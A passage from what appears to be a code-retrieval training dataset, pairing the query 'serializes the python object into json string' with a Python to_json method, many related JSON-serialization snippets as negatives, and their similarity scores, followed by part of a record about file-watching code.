_, match in enumerate(matches):\n pattern = match.group()\n path = path.replace(pattern, u'')\n pos = path.find(os.path.sep*2)\n if pos>=0:\n path = path[:pos+1]\n return path", "def normalize_upstream(path):\n if not path:\n return path\n if ':' not in path:\n return os.path.abspath(path)\n return path", "def is_valid_path(path):\r\n if not path:\r\n raise ValueError(f\"Invalid Path\")\r\n if os.path.isfile(path) and 'image' in filetype.guess(path).mime:\r\n return path\r\n else:\r\n raise ValueError(f\"Invalid Path {path}\")", "def test_fix_path(self):\n\n expected = \"hello\" + PyFunceble.directory_separator + \"world\" + PyFunceble.directory_separator # pylint: disable=line-too-long\n actual = Directory(\"/hello/world\").fix_path()\n\n self.assertEqual(expected, actual)\n\n actual = Directory(\"\\\\hello\\\\world\").fix_path()\n self.assertEqual(expected, actual)\n\n actual = Directory(\"hello\\\\world\").fix_path()\n self.assertEqual(expected, actual)\n\n actual = Directory(r\"hello\\world\").fix_path()\n self.assertEqual(expected, actual)\n\n actual = Directory(r\"hello/world/\").fix_path()\n self.assertEqual(expected, actual)" ]
[ "0.7186039", "0.71806985", "0.7127312", "0.71078247", "0.7051519", "0.69835657", "0.68522096", "0.6767365", "0.66817963", "0.6630477", "0.6626429", "0.6597407", "0.65462995", "0.64854527", "0.64659435", "0.64395905", "0.6419547", "0.63963103", "0.63918716", "0.63726133", "0.6370513", "0.63654417", "0.6359605", "0.63211846", "0.6317921", "0.62620324", "0.6260518", "0.6240475", "0.62391555", "0.62368137", "0.62218004", "0.6148585", "0.6146385", "0.6139157", "0.61225766", "0.61140996", "0.60976815", "0.60956156", "0.6092826", "0.6076153", "0.60715514", "0.6048538", "0.6044935", "0.6023365", "0.60210544", "0.6016631", "0.60074615", "0.5997735", "0.5986699", "0.5969342", "0.5968044", "0.59583765", "0.59512955", "0.5945436", "0.5944524", "0.59432656", "0.59387654", "0.59320354", "0.59113026", "0.5908886", "0.59024626", "0.5902326", "0.5895644", "0.5889471", "0.58891094", "0.5885593", "0.5880526", "0.58801204", "0.5875808", "0.58489937", "0.5835438", "0.5833162", "0.5822111", "0.5810495", "0.5782301", "0.5770445", "0.5768968", "0.5767512", "0.5765052", "0.57563287", "0.5753942", "0.5751678", "0.57497126", "0.5734445", "0.57259506", "0.57221323", "0.57201064", "0.5713447", "0.57109296", "0.57025784", "0.57013875", "0.5696451", "0.56961215", "0.5694892", "0.5692987", "0.56830096", "0.56822324", "0.5676408", "0.567597", "0.5667834" ]
0.7040683
5
serializes the python object into json string
def to_json(self, json_file): try: json.dump(self.container, open(json_file, 'w'), indent=4) except (FileNotFoundError, IOError) as err: print(err)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def serialize(self, obj):\n return json.dumps(obj)", "def toJSON(cls, obj):\n return json.dumps(obj)", "def toJSON(object):\n\treturn json.dumps(object, ensure_ascii=False)", "def serialize(cls, obj):\n return json.dumps(obj, cls=CustomTypeEncoder)", "def encode_json(obj):\n\treturn json.dumps(obj)", "def to_string(self):\n return json.dumps(self.to_json(), cls=ObjectEncoder)", "def serialize(self) -> str:\n return json.dumps(self.__dict__)", "def to_json_string(my_obj):\n obj = j.dumps(my_obj)\n return obj", "def json_serialize(self):\n raise NotImplementedError('json_serialize must be overriden')", "def to_json_string(my_obj):\n return json.dumps(my_obj)", "def to_json_string(my_obj):\n return json.dumps(my_obj)", "def to_json_string(my_obj):\n return json.dumps(my_obj)", "def to_json_string(my_obj):\n return json.dumps(my_obj)", "def json_encode(obj):\n return json.dumps(obj)", "def jsonify(obj):\n raise NotImplementedError", "def to_json_string(my_obj):\n return (json.dumps(my_obj))", "def to_json_string(my_obj):\n return (json.dumps(my_obj))", "def serialize(self):\n return json.dumps(self.as_dict())", "def to_json_string(my_obj):\n\n return json.dumps(my_obj)", "def to_json(self, *args, **kwargs):\n return json.dumps(self.serialize(primitive=True), *args, **kwargs)", "def serialize(self, obj):\n pass", "def to_json(self):\n return json.dumps(self._asdict())", "def to_json(self, *args, **kwargs):\n return json.dumps(self.serialize(), *args, **kwargs)", "def to_json_string(my_obj):\n j_obj = json.dumps(my_obj)\n return j_obj", "def as_json(self):", "def _toJSON(self):\n\n return json.encode(self.__toJSON())", "def json (self):\n\n return jsonpickle.encode(self, unpicklable=False)", "def json (self):\n\n return jsonpickle.encode(self, unpicklable=False)", "def to_json(self) :\n return jsonpickle.encode(self)", "def to_json(self) -> str:\n return json.dumps(asdict(self))", "def jsonify(self):\n jsonObject = self.getJsonObject()\n return json.dumps(jsonObject)", "def SerializeObject(self, data):\n\n if isinstance(data,dict):\n serializad_data = json.dumps(data)\n else:\n serializad_data = json.dumps(data.__dict__)\n\n return serializad_data", "def json(self):\n class ExtendedJSONEncoder(json.JSONEncoder):\n def default(self, obj):\n if isinstance(obj, datetime.date) or isinstance(obj, datetime.time):\n encoded_object = obj.isoformat()\n else:\n encoded_object = json.JSONEncoder.default(self, obj)\n return encoded_object\n\n obj = {\n 'operation': self.operation,\n 'version': self.version,\n 'language': self.language,\n 'identifiers': self.identifiers,\n 'store_execute': self.store_execute,\n 'status': self.status,\n 'lineage': self.lineage,\n 'inputs': dict((i, [inpt.json for inpt in self.inputs[i]]) for i in self.inputs),\n 'outputs': self.outputs,\n 'raw': self.raw\n }\n\n return json.dumps(obj, allow_nan=False, cls=ExtendedJSONEncoder)", "def __str__(self):\n return json.dumps(self.obj)", "def to_json_string(self) -> None:\n return json.dumps(dataclasses.asdict(self)) + \"\\n\"", "def serialize(obj):\n\n # if isinstance(obj, date):\n # serial = obj.isoformat()\n # return serial\n #\n # if isinstance(obj, time):\n # serial = obj.isoformat()\n # return serial\n\n return obj.to_json()", "def cls2json(self):\n return json.dumps(self.__dict__)", "def cls2json(self):\n return json.dumps(self.__dict__)", "def to_json(self) -> str:\n return json.dumps(self.to_dict())", "def to_json(self) -> str:\n return json.dumps(self.to_dict())", "def to_json(self) -> str:\n return json.dumps(self.to_dict())", "def to_json(self) -> str:\n return json.dumps(self.to_dict())", "def to_json(self) -> str:\n return json.dumps(self.to_dict())", "def to_json(self) -> str:\n return json.dumps(self.to_dict())", "def to_json(self) -> str:\n return json.dumps(self.to_dict())", "def to_json(self) -> str:\n return json.dumps(self.to_dict())", "def to_json(self) -> str:\n return json.dumps(self.to_dict())", "def to_json(self):\n return json.dumps(self.serialize())", "def serialize(self) -> bytes:\n return json_dumps(self._to_dict()).encode()", "def serialize(self) -> bytes:\n return json_dumps(self._to_dict()).encode()", "def serialize(self) -> bytes:\n return json_dumps(self._to_dict()).encode()", "def tojson(self) -> ty.Text:\n return json.dumps(self.todict())", "def tojson(python_object):\n return json.JSONEncoder().encode(python_object)", "def to_json(obj: Any) -> str:\n return mark_safe(json.dumps(obj))", "def to_json(self, *args, **kwargs):\n data = self.to_dict()\n\n return json_util.dumps(data)", "def to_json(self):\n pass", "def to_json(self):\n return json.dumps(self.__dict__)", "def asJsonString(self):\n return json.dumps(self.asDict(), sort_keys=True)", "def json_serial(obj):\n if isinstance(obj, LegipyModel):\n return obj.to_json()\n elif isinstance(obj, (datetime.date, datetime.datetime)):\n return obj.isoformat()\n raise TypeError(\"Type {0} not serializable\".format(repr(type(obj))))", "def to_json_str(self):\n return simplejson.dumps(self.to_json(), sort_keys=True)", "def to_json(self):\n return json.dumps(self.for_json())", "def to_json(self) -> JSON:\n pass", "def toJSON(self):\n raise NotImplementedError()", "def to_json_string(self):\n\t\treturn json.dumps(dataclasses.asdict(self), indent=2, sort_keys=True) + \"\\n\"", "def toJSON(self) -> str:\r\n try:\r\n _ = json.dumps(self.value)\r\n value = self.value\r\n except (TypeError, OverflowError):\r\n value = {}\r\n value['object_type'] = self.value.__class__.__name__\r\n if isinstance(self.value, RawData):\r\n type_str = '_{}__'.format(value['object_type'])\r\n for key, data in self.value.__dict__.items():\r\n value[key.replace(type_str, '')] = data\r\n else:\r\n type_str = '_{}'.format(value['object_type'])\r\n for key, data in self.value.__dict__.items():\r\n value[key.replace(type_str, '')] = data\r\n\r\n return json.dumps({'object_type' : 'RawData', 'version' : self.version,\r\n 'timestamp' : self.timestamp, 'label' : self.label,\r\n 'value' : value})", "def tojson(self):\n return json.dumps(self.jsonable())", "def jsonify(obj):\n d = model_to_dict(obj)\n return json.dumps(d, cls=LazyEncoder)", "def json_serial(obj):\n\n if isinstance(obj, (datetime, date)):\n return obj.isoformat()\n if isinstance(obj, complex):\n return str(obj)\n raise TypeError (\"Type %s not serializable\" % type(obj))", "def to_json(self):\n return json.dumps(self.dict)", "def as_json(self):\n return json.dumps(self.as_dict())", "def as_json(self):\n return json.dumps(self.as_dict())", "def as_json(self):\n return json.dumps(self.as_dict())", "def json(self):\n robot_dict = self.robot_dict()\n target_dict = self.target_dict()\n json_str = '{'\n json_str = json_str + '\"robot_obj\" : ' + json.dumps(robot_dict) + \",\\n\"\n json_str = json_str + '\"target_obj\" : ' + json.dumps(target_dict) + \"\\n\"\n json_str = json_str + '}'\n return(json_str)", "def __str__(self):\n return json.dumps(self.to_dict())", "def to_json(self):\n return json.dumps(self.to_dict())", "def to_json(self):\n return json.dumps(self.to_dict())", "def json_serial(obj):\r\n\r\n\t\tif isinstance(obj,(datetime, date)):\r\n\t\t\treturn obj.isoformat()\r\n\t\traise TypeError (\"Type %s not serializable\" % type(obj))", "def to_json(self, **kwargs):\n return dumps(self, **kwargs)", "def to_json(self, obj):\n _dict = obj._to_dict()\n if ID not in _dict or _dict[ID] is None:\n _dict[ID] = str(uuid.uuid4())\n json_str = json.dumps(_dict, indent=4)\n return json_str", "def json_serial(obj):\n\n if isinstance(obj, (datetime, date)):\n return str(obj) #.isoformat()\n raise TypeError (\"Type %s not serializable\" % type(obj))", "def serialize(self, obj):\n return obj", "def AsJsonString(self):\n return json.dumps(self.AsDict(), sort_keys=True)", "def toJson(self):\n return json.dumps(self.toDict(), default=str)", "def as_json_string(self):\n return json.dumps(self.as_dict(), sort_keys=True)", "def json(self):\n return json.dumps(self, default=lambda o: o.__dict__,\n sort_keys=True, indent=4)", "def pack(self, obj):\n # TODO: use a JSON encoder that handles more types?\n if obj is not None:\n return json.dumps(obj)", "def toJSONString(self):\n JSONObject = self.toDict()\n\n return json.dumps(JSONObject, ensure_ascii=False)", "def serialize(obj):\n return serialization_manager.serialize(obj)", "def json_dumps(self, obj: object) -> str:\n return json.dumps(obj, sort_keys=self.beautify, indent=4)", "def toJSON(self):\n return json.dumps(self, default=lambda o: o.__dict__)", "def to_json(obj):\n\n return json.dumps(obj, indent=2, default=_generated_class_serializer)", "def json_friendly(self):", "def toJson(self):\n return json.dumps(self.toDict())", "def toJson(self):\n return json.dumps(self.toDict())", "def osl_encode2json(obj):\n\n content, bundle = osl_encode(obj, False)\n # encoding should not bundle!\n assert bundle == []\n\n return json.dumps(content)", "def as_json(self) -> str:\n return json.dumps(self, cls=_RecordingJSONEncoder)", "def EventToJSON(_object):\n return json.dumps(_object, default=jsonDefault)", "def to_string(self) -> str:\n return json.dumps(self.to_json())", "def to_string(self) -> str:\n return json.dumps(self.to_json())", "def to_json(self) -> str:\n return JSONEncoder().encode(vars(self))", "def to_init_json(self) -> JSON:\n pass" ]
[ "0.84162724", "0.82060945", "0.7896136", "0.7808678", "0.7746026", "0.7719003", "0.769862", "0.7666531", "0.7664871", "0.76284343", "0.76284343", "0.76284343", "0.76284343", "0.76254743", "0.7620307", "0.7614118", "0.7614118", "0.76006883", "0.7582615", "0.754739", "0.75353134", "0.75265926", "0.75207174", "0.7515635", "0.75130916", "0.7500792", "0.74952143", "0.74952143", "0.7469639", "0.7468795", "0.74552137", "0.74474394", "0.74405754", "0.74391973", "0.7414831", "0.74147797", "0.74019647", "0.74019647", "0.74006045", "0.74006045", "0.74006045", "0.74006045", "0.74006045", "0.74006045", "0.74006045", "0.74006045", "0.74006045", "0.73969865", "0.73902255", "0.73902255", "0.73902255", "0.7383914", "0.7364207", "0.73578256", "0.73549575", "0.73536545", "0.735169", "0.734026", "0.7335726", "0.7317221", "0.7307949", "0.7304009", "0.7293016", "0.7273679", "0.7249555", "0.7248599", "0.7214939", "0.7214209", "0.7204066", "0.7182805", "0.7182805", "0.7182805", "0.71798456", "0.7177786", "0.7177227", "0.7177227", "0.7174731", "0.7169615", "0.7169294", "0.7166318", "0.716465", "0.7163234", "0.7159844", "0.71578133", "0.71551365", "0.7154678", "0.7148767", "0.7147119", "0.7135922", "0.7132492", "0.7127893", "0.71257", "0.7115515", "0.7115515", "0.7114026", "0.71106994", "0.7106287", "0.7103491", "0.7103491", "0.70823324", "0.7081757" ]
0.0
-1
This function will watch the given file for any updates.
def watch(log_file): log_file.seek(0, os.SEEK_END) while True: line = LogParser.read_line(log_file) if not line: time.sleep(1) continue yield line
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def statusupdate(filepath):\n pass", "def watch(self):", "def watch_changes(directories):\n default_watcher.watch(directories)\n return default_watcher.get_notification_thread()", "def _file_watcher(self, filename, interval):\n fp = open(filename)\n\n line = \"\"\n while self._watch_file:\n partial_line = fp.readline()\n if len(partial_line) != 0:\n line += partial_line\n if line.endswith(\"\\n\"):\n yield line\n line = \"\"\n else:\n time.sleep(interval)\n\n fp.close()", "def watch_file(self, filename, track=1):\n\n self._watched_files.append(TailFollow(filename, track))", "def watch_for_file_changes(self, root_dir, callback):\n # type: (str, Callable[[], None]) -> None\n raise NotImplementedError(\"watch_for_file_changes\")", "def watch(filename):\n with open(filename) as log:\n # Move to the end of the file\n file_size = os.stat(filename)[6]\n log.seek(file_size)\n while True:\n last_location = log.tell()\n line = log.readline()\n if not line:\n time.sleep(0.1)\n log.seek(last_location)\n else:\n yield line", "def watch(self, *argv, **kwargs):\n pass", "def watch(self, callback):\n raise NotImplementedError", "def monitor(self, filename):\n self.do_tail(filename, 0)", "def wait_file_update(\n file_name: str,\n t0: float,\n label: str,\n t: float,\n ) -> None:\n\n # Loop until the file has been updated\n while 1:\n\n # See how recently the file has been updated\n t_mod = os.path.getmtime(file_name)\n\n # Break out of the loop if the file has been updated since the given time\n if t_mod > t0:\n\n break\n\n # Wait and check again\n else:\n wait(t, \"%s file to be updated...\" % label)\n\n return", "def _watchFolder(self):\n wm = pyinotify.WatchManager()\n wm.add_watch(self.gdocs_folder, pyinotify.IN_MODIFY, rec=True)\n \n handler = EventHandler(self)\n notifier = pyinotify.Notifier(wm, handler)\n \n print 'waiting for changes . . .'\n notifier.loop()", "def watch(self) -> None:\n raise NotImplementedError()", "def test_watch_file(mock_os, mock_time):\n # Our function will throw KeyboardInterrupt when called for the 2nd time,\n # ending the watching gracefully.This will help in testing the\n # watch_file function.\n call_count = [0]\n\n def func():\n call_count[0] = call_count[0] + 1\n if call_count[0] == 2:\n raise KeyboardInterrupt()\n\n # Instead of modifying any file, let's change the return value of\n # os.path.getmtime. Start with initial value of 0.\n mock_os.path.getmtime.return_value = 0\n\n t = threading.Thread(target=uflash.watch_file,\n args=('path/to/file', func))\n t.start()\n time.sleep(0.01)\n mock_os.path.getmtime.return_value = 1 # Simulate file change\n time.sleep(0.01)\n assert t.is_alive()\n assert call_count[0] == 1\n mock_os.path.getmtime.return_value = 2 # Simulate file change\n t.join()\n assert call_count[0] == 2", "def watch_file(self, path: Path) -> None:\n directory = path.parent\n logger.debug(\"Starting watch: %s\", path)\n with self.lock:\n if directory in self.directories:\n self.directories[directory].increment(path.name)\n return\n\n watch = self.observer.schedule(self.handler, str(directory))\n self.directories[directory] = self.AssetWatch(\n Counter({path.name: 1}), watch\n )", "def watch(self):\n wm = pyinotify.WatchManager()\n self.notifier = pyinotify.Notifier(wm, default_proc_fun=self.callback)\n wm.add_watch(self.directory, pyinotify.ALL_EVENTS)\n try:\n self.notifier.loop()\n except (KeyboardInterrupt, AttributeError):\n print_notification(\"Stopping\")\n finally:\n self.notifier.stop()\n self.terminate_processes()", "def watch(self):\n raise NotImplementedError()", "def start_watcher():\n while True:\n request_date = datetime.datetime.utcnow().strftime(\"%Y%m%d\")\n pull_request_from_remote(remote_files=\"*%s*\" % request_date)\n new_requests = check_for_new_request(request_date=request_date)\n if not new_requests:\n time.sleep(5)\n continue\n\n # noinspection PyTypeChecker\n for r in new_requests:\n print(\"Processing %s\" % r)\n try:\n ret = process_new_request(r, request_date=request_date,\n add2db=True)\n print(ret)\n except:\n os.system('cp -r %s /home/sedm/growth_marshal/archived/failed/'\n % r)\n os.system('cp -r %s /home/sedm/growth_marshal/archived/%s/' %\n (r, request_date))\n\n print(\"Waiting %ss before checking for new request\" % 5)\n time.sleep(5)", "def run_file_change(op_list_file):\n if os.path.exists(\"flag_change_file.txt\"):\n print(\n \"-----maybe op_file has changed, so don't need to change again------\"\n )\n else:\n run_multi_thread(op_list_file)", "def on_file_changed(self, path):\n\t\tpass", "async def async_update(self):\n self.update_file_path()", "def SetupFileWatcher(filename, cb):\n wm = pyinotify.WatchManager()\n handler = FileEventHandler(wm, filename, cb)\n asyncnotifier.AsyncNotifier(wm, default_proc_fun=handler)", "def update(self):\n while True:\n result = win32event.WaitForSingleObject(self._overlapped.hEvent, 0)\n if result == win32con.WAIT_OBJECT_0:\n self._num_bytes_returned = win32file.GetOverlappedResult(\n self._directory,\n self._overlapped,\n True\n )\n timestamp = datetime.datetime.fromtimestamp(\n datetime.datetime.utcnow().timestamp()\n )\n self._event_properties['Path'] = self._get_path()\n self._event_properties['FileName'] = self._get_file_name()\n self._event_properties['Timestamp'] = timestamp\n self._event_properties['EventType'] = self._get_event_type()\n self._set_watcher()\n break\n if result == win32con.WAIT_FAILED:\n self.close()\n raise FileMonitorError()", "def _update_version_watch(self, new_version, _):\n if new_version is None:\n self._stopped = True\n return False\n\n persistent_update_version = retry_data_watch_coroutine(\n self.version_node, self.update_version\n )\n main_io_loop = IOLoop.instance()\n main_io_loop.add_callback(persistent_update_version, new_version)", "async def _watch_status(self, job_id, job_paths):\n status_path = job_paths['status.json']\n\n watcher = aionotify.Watcher()\n watcher.watch(status_path, aionotify.Flags.CLOSE_WRITE)\n await watcher.setup(self.loop)\n try:\n while True:\n try:\n await self._read_status(job_id, job_paths)\n await watcher.get_event()\n self.logger.debug(f'Detected status change for job {job_id}')\n except concurrent.futures.CancelledError:\n # Break loop (likely normal exit through task cancellation)\n break\n except Exception: # pylint: disable=broad-except\n self.logger.exception(f'Exception while watching status of job {job_id}')\n finally:\n watcher.unwatch(status_path)\n watcher.close()", "def watch(self, path):\n path_obj = Path(path)\n if not path_obj.exists():\n raise FileObserverException(\"Can not observe non exist path\")\n\n self._observed_paths[path] = calculate_checksum(path)\n\n # Watchdog will observe the path's parent path to make sure not missing the event if the path itself got deleted\n parent_path = str(path_obj.parent)\n child_paths = self._watch_dog_observed_paths.get(parent_path, [])\n first_time = not bool(child_paths)\n if path not in child_paths:\n child_paths += [path]\n self._watch_dog_observed_paths[parent_path] = child_paths\n if first_time:\n self._observed_watches[parent_path] = self._observer.schedule(\n self._code_change_handler, parent_path, recursive=True\n )", "def run_version(watcher: inotify.adapters.Inotify, config: Config) -> None:\n for directory in config[\"directories\"]:\n make_dir(directory)\n\n for watch_job in config[\"watches\"]:\n if watch_job[\"type\"] == \"simple\":\n watch_job_simple = cast(ConfigSimpleValue, watch_job)\n watch_directory_recursively(watcher, watch_job_simple[\"path\"])\n elif watch_job[\"type\"] == \"regex\":\n watch_job_regex = cast(ConfigRegexValue, watch_job)\n watch_directory_recursively(watcher, watch_job_regex[\"base_path\"])\n else:\n logging.warning(f\"Unknown watch job type: {watch_job['type']}\")\n\n for _, type_names, path, filename in watcher.event_gen(yield_nones=False):\n filepath = os.path.join(path, filename)\n\n # print(f\"event: {type_names}, {path}, {filename}\")\n if \"IN_CREATE\" in type_names and \"IN_ISDIR\" in type_names: # Directory was created\n watcher.add_watch(filepath)\n logging.warning(f\"Watching new directory {filepath}\")\n continue\n\n if \"IN_CLOSE_WRITE\" not in type_names: # Skip anything else as we're after events after a file has been written\n continue\n\n simple_conf, regex_conf = get_watch_job(filepath, config)\n\n if simple_conf: # Process simple files put in directory\n slug = simple_conf[\"slug\"]\n blob_name = f\"{slug}/{filename}\"\n\n upload_file(filepath, simple_conf[\"dsn\"], simple_conf[\"container\"], blob_name)\n\n elif regex_conf: # Check if filepath matches regex\n local_path = filepath.replace(regex_conf[\"base_path\"], \"\").lstrip(\"/\")\n match = re.match(regex_conf[\"regex\"], local_path)\n if not match:\n logging.warning(f\"No watches to cover file: {filename}\")\n continue\n\n match_data = match.groupdict()\n match_data[\"filename\"] = filename\n blob_name = regex_conf[\"dest_path\"].format(**match_data)\n upload_file(filepath, regex_conf[\"dsn\"], regex_conf[\"container\"], blob_name)\n\n else:\n logging.warning(f\"No watches to cover file: {filename}\")\n\n return None", "def test_yaml_file_watch(self):\n # Set initial data\n _setup_template_value('yaml_file_test_values.tmp.yml', 'yaml_file_test_values_1.yml')\n\n with TemplateRenderThread('yaml_file_test.t', 'yaml_file_test.tmp.out') as renderer:\n self.assertStringEqualToTemplateFileWithIterations(renderer.output_data_getter,\n 'yaml_file_test_values_expected_1.out')\n\n # Set updated data\n print('Updating file..')\n _setup_template_value('yaml_file_test_values.tmp.yml', 'yaml_file_test_values_2.yml')\n self.assertStringEqualToTemplateFileWithIterations(renderer.output_data_getter,\n 'yaml_file_test_values_expected_2.out')", "def watch(self):\n observer = Observer()\n observer.schedule(ActionHandler(self.actionHandler),\n path=self.projectPath,\n recursive=True)\n observer.start()\n try:\n while True:\n sleep(1)\n except KeyboardInterrupt:\n observer.stop()\n observer.join()", "def process_file(self, filepath, only_if_updated=True):\n raise NotImplementedError()", "def test_change_mtime(self):\n with pike.Graph('g') as graph:\n pike.glob('.', '*') | pike.ChangeListenerNode(fingerprint='mtime')\n self.make_files(foo='a', bar='b')\n ret = graph.run()\n self.assert_files_equal(ret['default'], ['foo', 'bar'])\n new_mtime = time.time() + 1\n os.utime('foo', (new_mtime, new_mtime))\n ret = graph.run()\n self.assert_files_equal(ret['default'], ['foo'])", "def watch_filesystem(ip_queue=None, watch_dir='', notify=False, recursive=False, syncer=None,\n accountant=None, daemon=False):\n event_handler = FSChangesHandler(\n ip_queue=ip_queue,\n notify=notify,\n syncer=syncer,\n accountant=accountant\n )\n observer = Observer()\n observer.schedule(event_handler, path=watch_dir, recursive=recursive)\n\n # If run from simplesync, this will be inside the observer_process process\n observer.daemon = daemon\n observer.start()\n print(\"\\n>> Started observer\\n>> Watching dir: {}\".format(watch_dir))\n try:\n while True:\n time.sleep(1)\n except KeyboardInterrupt:\n observer.stop()\n # observer.join()", "def inotify_code_changed():\n wm = pyinotify.WatchManager()\n notifier = pyinotify.Notifier(wm, EventHandler())\n\n def update_watch(sender=None, **kwargs):\n if sender and getattr(sender, 'handles_files', False):\n # No need to update watches when request serves files.\n # (sender is supposed to be a django.core.handlers.BaseHandler subclass)\n return\n\n mask = (\n pyinotify.IN_MODIFY |\n pyinotify.IN_DELETE |\n pyinotify.IN_ATTRIB |\n pyinotify.IN_MOVED_FROM |\n pyinotify.IN_MOVED_TO |\n pyinotify.IN_CREATE |\n pyinotify.IN_DELETE_SELF |\n pyinotify.IN_MOVE_SELF\n )\n\n wm.add_watch('/home/matthew/Projects/mattbot', mask)\n\n # Block until an event happens.\n update_watch()\n notifier.check_events(timeout=None)\n notifier.read_events()\n notifier.process_events()\n notifier.stop()\n\n # If we are here the code must have changed.\n return EventHandler.modified_code", "def watch():\n\n with lcd(FRONTENDDIR):\n cmd = '%(gulp)s watch' % {'gulp': get_gulp()}\n local(cmd)", "def watch(self, url):\n self.__url = url\n self.downtime_info = None\n self.__timer.start()", "def background_import_dir_and_watch(bv):\n background_import_dir(bv, watch=True)", "def on_modified(self, event):\n \n if not event.is_directory: \n\n file_name = os.path.basename(event.src_path)\n \n if file_name not in self.ignore_files:\n parent = os.path.dirname(event.src_path)\n file_id = list(filter(lambda f: f[\"name\"] == file_name, self.filesystem[parent][\"files\"]))[0][\"id\"]\n self.gapy.update_file(file_id, path=parent)\n self.gapy.logger.info(\"The file {} was modified, the content was updated\".format(file_name, parent))\n print(f\"\\nThe file {file_name} was modified and synchronized\")", "def watch(url: str, delay: float) -> None:\n # Get ETag and/or Last-Modified, if there is one.\n req = Request(url)\n with urlopen(req) as f:\n if f.getcode() != 200:\n logging.error(f\"Got {f.getcode()} for {url}. Exiting.\")\n notify(f\"Got HTTP {f.getcode()}. Exiting.\", url)\n return\n if 'ETag' in f.headers:\n req.add_header('If-None-Match', f.headers['ETag'])\n etag = f.headers['ETag']\n else:\n etag = None\n if 'Last-Modified' in f.headers:\n req.add_header('If-Modified-Since', f.headers['Last-Modified'])\n last_modified = f.headers['Last-Modified']\n else:\n last_modified = None\n md5 = get_md5(f)\n\n logging.debug(f\"{url}: ETag={etag} last_modified={last_modified}\")\n\n done = False\n send_confirmation_at: Optional[float] = time.time() + 10 # seconds\n while not done:\n time.sleep(delay)\n if send_confirmation_at is not None and send_confirmation_at < time.time():\n logging.info(f\"Sending a notification for {url} that we're running.\")\n notify(\"Watching\", url)\n send_confirmation_at = None\n try:\n with urlopen(req) as f:\n if f.getcode() != 200:\n # Maybe these are all covered by exceptions?\n logging.error(f\"Got {f.getcode()} for {url}. Continuing.\")\n continue\n changed = False\n if 'ETag' in f.headers and f.headers['ETag'] != etag:\n changed = True\n if ('Last-Modified' in f.headers and\n f.headers['Last-Modified'] != last_modified):\n changed = True\n if not changed and md5 != get_md5(f):\n changed = True\n if changed:\n notify(\"Site changed\", url)\n logging.info(f\"Sending notification of change to {url}.\")\n done = True\n last_modified = f.headers['Last-Modified']\n except HTTPError as e:\n if e.code == 304:\n logging.debug(f\"{url} not changed.\")\n else:\n notify(f\"Got HTTP error {e.code}. Continuing.\", url)\n logging.error(f\"Got {e.code} for {url}. Continuing.\")\n\n logging.info(f\"Stopping for {url}.\")", "def listening(self):\n # starting point (CheckPoint)\n try:\n last_index = len(re.split('\\n', open(self.path, 'r').read())) - 1\n \n while True:\n \n curr_size = path.getsize(self.path)\n modified_time = path.getmtime(self.path)\n \n time.sleep(.2)\n # Latest.log Either got Archived by Minecraft or a new Instance of Minecraft Opened\n if self.fileSize > curr_size:\n print('\\033[31mDetected Change in Size')\n print('\\033[32mDid You reopen Minecraft?')\n self.fileSize = curr_size\n last_index = len(re.split('\\n', open(self.path, 'r').read())) - 1\n \n # MODIFIED??? must be minecraft dumping chat onto lastest.log\n if self.last_time_modified != modified_time:\n \n self.last_time_modified = modified_time\n chat = open(self.path, 'r').read()\n newChatLines = re.split('\\n', chat)[last_index:] # Reads Lines From the last checkpoint\n \n \n \n curr_index = -1\n\n for line in newChatLines:\n\n curr_index += 1\n # if line is not a \\n or \\r tag then our Line checkpoint is the current line\n if line:\n last_index += 1\n \n # Ignores ERRORS / WARNINGS focuses on chat logs\n if '[Client thread/INFO]: [CHAT]' in line:\n\n self.newLineEvent(line)\n # TODO LOGING\n except (FileExistsError, FileNotFoundError, PermissionError, NotADirectoryError) as e:\n err_helper.showError('0x1', e, crash=True)", "def _file_update(self, filename):\n values = TaskInfo._parse_file(filename)\n self._load_dict(values)", "def notify(self, file_info):\n for observer in self._observers:\n observer.update(file_info)", "def watch(self, widget, stylesheet_path):\n self._widget_sheet_map[stylesheet_path].append(widget)\n \n self._watcher = QtCore.QFileSystemWatcher()\n self._watcher.addPath(stylesheet_path)\n \n self._watcher.fileChanged.connect(self.update)\n \n self.update()", "def main(dir_to_watch):\n event_handler = AudioCreatedHandler()\n observer = Observer()\n observer.schedule(event_handler, dir_to_watch, recursive=True)\n observer.start()\n try:\n while True:\n time.sleep(1) \n except KeyboardInterrupt:\n print \"Stopping...\"\n observer.stop()\n observer.join()", "def watch_note(note, handle_func):\n ob = Observer()\n handler = FileSystemEventHandler()\n\n def handle_event(event):\n _, filename = os.path.split(event.src_path)\n if note.filename == filename or os.path.normpath(event.src_path) == os.path.normpath(note.assets):\n handle_func(note)\n handler.on_any_event = handle_event\n\n print('Watching {0}...'.format(note.title))\n ob.schedule(handler, note.notebook.path.abs, recursive=True)\n ob.start()\n\n try:\n while True:\n time.sleep(1)\n except KeyboardInterrupt:\n print('Stopping...')\n ob.stop()\n ob.join()", "def check_file(modify_times, path):\n try:\n modified = os.stat(path).st_mtime\n except Exception:\n return\n if path not in modify_times:\n modify_times[path] = modified\n if modify_times[path] != modified:\n print('{} modified; restarting server'.format(path))\n modify_times[path] = modified\n start_process()", "def should_watch_dir(self, entry):\n return True", "def _on_watch_changes(self, *changes):\n self.dirty = self._git.is_dirty()\n if self._watcher:\n for change in self._watcher.changes:\n for tracker in self._trackers:\n tracked_path = Path(self._git.working_dir) / change[\"path\"]\n if tracker.path.resolve() == tracked_path.resolve():\n tracker._on_file_change(None)\n return [\n dict(a_path=diff.a_path, b_path=diff.b_path, change_type=diff.change_type)\n for diff in self._git.index.diff(None)\n ] + [\n dict(a_path=None, b_path=ut, change_type=\"U\")\n for ut in self._git.untracked_files\n ]", "def watch(self, name, callback):\n self.external_watchers[name].add(callback)", "def modified(self, eventsrc):\n if not self.has_changed(eventsrc):\n return\n matched = False\n for pattern in self.globs:\n if fnmatch.fnmatch(eventsrc, pattern):\n matched = True\n break\n if matched:\n for action in self.actions:\n action(cmdpath=eventsrc, log=MachopLog(self.queue, 'watch'))\n self.announce()", "def ensure_watch(self):\n if self._stopped:\n self._stopped = False\n self.watch = self.zk_client.DataWatch(self.version_node,\n self._update_version_watch)", "def watch():\n sh(\"watchmedo shell-command \\\n --patterns='*.py;*md;' \\\n --recursive \\\n --command='clear && paver build' \\\n .\")", "def update_data(self, url, file_name):\n if file_name == 'upcoming':\n r = self.gosu\n # Thread(target=self.update_upcoming_matches_teams, args=(r,)).start()\n else:\n r = requests.get(url)\n r = r.json()\n with 